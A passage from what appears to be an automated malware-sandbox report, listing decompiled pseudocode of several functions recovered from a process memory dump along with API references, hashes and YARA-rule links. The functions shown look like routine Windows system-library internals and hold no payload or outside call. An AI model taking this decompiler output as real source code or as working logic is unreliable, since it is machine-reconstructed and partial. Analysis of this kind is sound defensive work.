					return E0299B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0299CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E02977D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E02A28F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0299AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x2a48628; // 0x0
								_v68 = _t77;
								_t78 =  *0x2a4862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x2a48628; // 0x0
							_t116 =  *0x2a4862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0297b94c
0x0297b956
0x0297b95c
0x0297b95e
0x0297b964
0x0297b969
0x0297b96d
0x0297b96d
0x0297b970
0x0297b974
0x0297b97a
0x0297badf
0x0297badf
0x0297bae2
0x0297bae4
0x0297bae6
0x0297baf0
0x029c2cb8
0x0297baf6
0x0297baf6
0x0297baf6
0x0297bafd
0x0297bb1f
0x0297bb1f
0x0297baff
0x0297bb00
0x0297bb00
0x0297bb03
0x0297bb03
0x0297bacb
0x0297bacf
0x0297bad0
0x0297bad1
0x0297badc
0x0297badc
0x0297b980
0x0297b980
0x0297b988
0x0297b98b
0x0297b98d
0x0297b990
0x0297b993
0x0297b999
0x0297b99b
0x0297b9a1
0x0297b9a5
0x0297b9aa
0x0297b9b0
0x0297b9bb
0x0297b9c0
0x0297b9c3
0x0297b9ca
0x0297b9cc
0x0297b9cf
0x0297b9d3
0x0297b9d7
0x0297ba94
0x0297ba94
0x0297ba98
0x0297baa3
0x029c2ccb
0x0297baa9
0x0297baa9
0x0297baa9
0x0297bab1
0x029c2cd5
0x029c2cdd
0x029c2cdd
0x0297babb
0x0297babc
0x0297bac2
0x0297bac3
0x0297bac3
0x0297bac6
0x00000000
0x0297b9dd
0x0297b9dd
0x0297b9e7
0x0297b9e7
0x0297b9ec
0x0297b9ec
0x0297b9f1
0x0297b9f5
0x0297b9fa
0x0297ba00
0x0297ba0c
0x0297ba10
0x0297ba10
0x0297ba12
0x0297ba18
0x00000000
0x00000000
0x0297bb26
0x0297bb26
0x0297ba1e
0x0297ba1e
0x0297ba23
0x0297ba25
0x0297ba2c
0x0297ba30
0x0297ba35
0x0297ba35
0x0297ba41
0x0297ba46
0x0297ba4c
0x0297ba50
0x0297ba54
0x0297ba6a
0x0297ba6e
0x0297ba70
0x0297ba74
0x0297ba78
0x0297ba7a
0x0297ba7c
0x0297ba8e
0x0297ba90
0x0297ba92
0x0297bb14
0x0297bb14
0x0297bb16
0x0297bb16
0x00000000
0x0297ba7c
0x0297bb0a
0x0297bb0d
0x00000000
0x00000000
0x00000000
0x0297bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0297B9A5

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 750fde8b8552cda94176292696eadb8fa6266363ed3bd5c318162e37928f3864
Instruction ID: e4b6c967b4d09ef7bc82e5de65a0ae75540206c131c2cee659c2497355e98cdd
Opcode Fuzzy Hash: 750fde8b8552cda94176292696eadb8fa6266363ed3bd5c318162e37928f3864
Instruction Fuzzy Hash: CC514971A08341CFC724DF29C490A2AFBE9FB88718F24496EF99587354DB31E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0295B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0295B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x2a2f7a8);
				E029AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E029AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0299D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0299F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E029ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0299B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0299B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0299E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0299A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0295b171
0x0295b171
0x0295b171
0x0295b171
0x0295b171
0x0295b176
0x0295b17b
0x0295b180
0x0295b186
0x0295b18f
0x0295b198
0x0295b1a4
0x0295b1aa
0x029b4802
0x029b4802
0x029b4805
0x029b480c
0x029b480e
0x0295b1d1
0x0295b1d3
0x0295b1de
0x0295b1de
0x029b4817
0x029b481e
0x029b4820
0x029b4822
0x029b4822
0x029b4824
0x029b4824
0x029b482a
0x00000000
0x00000000
0x029b4835
0x029b483a
0x029b483d
0x029b483f
0x029b4842
0x029b4842
0x029b4842
0x029b4846
0x029b484c
0x029b484e
0x029b4851
0x029b4851
0x029b4853
0x029b4854
0x029b4854
0x029b4858
0x029b485a
0x029b485a
0x029b485d
0x029b485f
0x029b4861
0x029b4861
0x029b4866
0x029b486b
0x029b486e
0x029b4871
0x029b4876
0x029b4876
0x029b4878
0x029b487b
0x029b4884
0x029b4884
0x00000000
0x029b487d
0x029b487d
0x029b4882
0x029b4889
0x029b4889
0x029b488f
0x029b4891
0x029b48e0
0x029b48e2
0x029b48e4
0x029b48e4
0x029b48e7
0x029b48e7
0x029b48ed
0x029b48f4
0x029b48f6
0x029b4951
0x029b4951
0x029b4953
0x029b4953
0x029b4956
0x029b4956
0x029b4958
0x029b4959
0x029b4959
0x029b495d
0x029b495d
0x029b495f
0x029b495f
0x029b4965
0x029b4969
0x029b49ba
0x029b49ba
0x029b49c1
0x029b49c5
0x029b49cc
0x029b49d4
0x029b49d7
0x029b49da
0x029b49e4
0x029b49e5
0x029b49f3
0x029b4a02
0x00000000
0x029b4a02
0x029b4972
0x029b4974
0x00000000
0x00000000
0x029b4976
0x029b4979
0x029b4982
0x029b4983
0x029b4984
0x029b498b
0x029b498d
0x029b4991
0x029b4993
0x029b4999
0x029b499d
0x029b49a2
0x029b49a2
0x029b49a2
0x029b4999
0x029b49ac
0x00000000
0x029b49b3
0x029b48f8
0x029b48fe
0x00000000
0x00000000
0x00000000
0x029b48fe
0x029b4895
0x029b489c
0x029b48ad
0x029b48b2
0x029b48b5
0x029b48b7
0x029b48ba
0x029b48bc
0x029b48c6
0x029b48c6
0x029b48cb
0x029b48d1
0x029b48d4
0x029b48d8
0x029b48d8
0x00000000
0x029b48d8
0x029b48be
0x029b48c0
0x00000000
0x00000000
0x029b48c2
0x00000000
0x00000000
0x00000000
0x029b48c4
0x00000000
0x029b4882
0x029b487b
0x029b4904
0x029b4906
0x00000000
0x00000000
0x029b4908
0x029b490e
0x00000000
0x00000000
0x029b4910
0x029b4917
0x029b4917
0x00000000
0x029b4917
0x0295b1ba
0x029b47f9
0x029b47fc
0x00000000
0x00000000
0x00000000
0x029b47fc
0x0295b1c0
0x0295b1c0
0x0295b1c3
0x0295b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 029B48AD

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 555ad9249e334efd026c502e305e27f6b615922cee8b7f85f2b9ad1fd202dc18
Instruction ID: 957fcaf20fa72f587c9b46b740f8b2e2fdcd5dda69d47652bf7021e3937a9552
Opcode Fuzzy Hash: 555ad9249e334efd026c502e305e27f6b615922cee8b7f85f2b9ad1fd202dc18
Instruction Fuzzy Hash: 1751EF71D002A98EDF22CF68CA60BEEBBB5BF44714F1041A9D859AB282D7304941EF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A03D40, Relevance: 1.6, APIs: 1, Instructions: 98
timeCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02A03D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x2a4d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E02972280(_t34, 0x2a48a6c);
				_t64 =  *0x2a45768; // 0x77f05768
				if(_t64 != 0x2a45768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77f05770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0296FFB0(_t53, _t64, 0x2a48a6c);
						 *0x2a4b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E02972280(_t45, 0x2a48a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x2a45768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0296FFB0(_t51, _t64, 0x2a48a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0299B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

0x02a03d40
0x02a03d48
0x02a03d52
0x02a03d59
0x02a03d5d
0x02a03d61
0x02a03d63
0x02a03d67
0x02a03d69
0x02a03d72
0x02a03d76
0x02a03d7a
0x02a03d7f
0x02a03d8b
0x02a03d91
0x02a03d91
0x02a03d91
0x02a03d94
0x02a03d96
0x02a03d9d
0x02a03da1
0x02a03db0
0x02a03dba
0x02a03dbc
0x02a03dbc
0x02a03dc6
0x02a03dcb
0x02a03dcf
0x02a03dd1
0x02a03dd4
0x00000000
0x00000000
0x02a03dd9
0x02a03e0c
0x02a03e0c
0x02a03e0f
0x02a03ddb
0x02a03ddb
0x02a03de0
0x00000000
0x02a03de2
0x02a03de2
0x02a03de4
0x02a03de8
0x02a03deb
0x02a03df1
0x00000000
0x02a03df3
0x02a03df3
0x02a03df5
0x02a03df8
0x02a03dfa
0x00000000
0x02a03dfa
0x02a03df1
0x02a03de0
0x02a03e11
0x02a03e11
0x00000000
0x02a03dfe
0x02a03e04
0x02a03e06
0x00000000
0x02a03e06
0x00000000
0x02a03e04
0x02a03d91
0x02a03e15
0x02a03e1a
0x02a03e1f
0x02a03e1f
0x02a03e23
0x02a03e29
0x00000000
0x00000000
0x02a03e2e
0x00000000
0x02a03e30
0x02a03e30
0x02a03e35
0x00000000
0x02a03e37
0x02a03e3e
0x02a03e42
0x02a03e48
0x02a03e4e
0x00000000
0x02a03e4e
0x02a03e35
0x00000000
0x02a03e2e
0x02a03e5b
0x02a03e5c
0x02a03e5d
0x02a03e68
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 02A03DB0

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 344b13ae2e60e051a7e68dd02dc9c03f0a94334080ed14b9d36a17715ca34b49
Instruction ID: 1b5728ab44457050efe8b834890dfaf185af7ea67dbcfa3589c29eeba365bc0b
Opcode Fuzzy Hash: 344b13ae2e60e051a7e68dd02dc9c03f0a94334080ed14b9d36a17715ca34b49
Instruction Fuzzy Hash: 97315871905302DFCB14DF14E58091ABBE1FFC5714F454AAEE4899B290DB34E905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02994A2C, Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02994A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x2a4d360 ^ _t62;
				_v8 =  *0x2a4d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E02972280(_t26, 0x2a48608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0296FFB0(_t41, _t51, 0x2a48608);
						L2:
						 *0x2a4b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0299B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E02972280(_t28, 0x2a48608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0296FFB0(_t42, _t53, 0x2a48608);
							if(_t53 != 0) {
								L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0296FFB0(_t41, _t51, 0x2a48608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x02994a2c
0x02994a34
0x02994a3c
0x02994a3e
0x02994a48
0x02994a4b
0x02994a4d
0x02994a51
0x02994a9c
0x00000000
0x00000000
0x02994aa3
0x02994aa8
0x02994aad
0x02994ab1
0x02994ade
0x02994ae3
0x02994a5a
0x02994a62
0x02994a6a
0x02994a6e
0x029cf203
0x02994a84
0x02994a88
0x02994a89
0x02994a8a
0x02994a95
0x02994a95
0x02994a79
0x02994a80
0x02994af2
0x02994af4
0x02994af9
0x02994aff
0x02994b01
0x02994b03
0x02994b08
0x029cf20a
0x029cf212
0x029cf216
0x029cf216
0x02994b08
0x02994b13
0x02994b1a
0x029cf229
0x029cf229
0x02994b1a
0x02994a82
0x00000000
0x02994a82
0x02994ab7
0x02994acd
0x02994acd
0x02994ad5
0x02994ada
0x00000000
0x02994ada
0x02994ac2
0x02994acb
0x00000000
0x00000000
0x00000000
0x02994acb
0x02994a53
0x02994a53
0x02994a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 02994A62

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 9bb0d3a5afe7fc639baf2919e629788ec3d2a239f7f25c1c60cfef012a97927d
Instruction ID: f708364c22dce475880433c944b1bc55f206b2bcd17199998964033c14174dfe
Opcode Fuzzy Hash: 9bb0d3a5afe7fc639baf2919e629788ec3d2a239f7f25c1c60cfef012a97927d
Instruction Fuzzy Hash: 923124326023109FDB22DF58C944B2AFBEAFFC1B24F405929E85607640CB70E802DB86

Uniqueness

Uniqueness Score: -1.00%

Function 02970050, Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02970050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x2a4d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E02989ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0299B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E02A28A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E02989702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x2a4b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x02970055
0x0297005d
0x02970062
0x0297006c
0x0297006f
0x02970074
0x0297007a
0x0297007a
0x02970080
0x02970080
0x02970087
0x0297008d
0x0297008f
0x02970093
0x02970095
0x0297009b
0x029700f8
0x029700fb
0x029700fc
0x029700ff
0x02970108
0x02970108
0x029700a2
0x029700a6
0x029700b3
0x029700bc
0x029700c5
0x029700ca
0x029bc01e
0x00000000
0x00000000
0x029bc02d
0x029700d5
0x029700d9
0x029bc03d
0x029bc046
0x029bc046
0x029700df
0x029700e2
0x029700ea
0x029700ef
0x029700f2
0x029700f6
0x02970111
0x02970117
0x02970117
0x00000000
0x029700f6
0x029700d0
0x029700d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 02970111

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
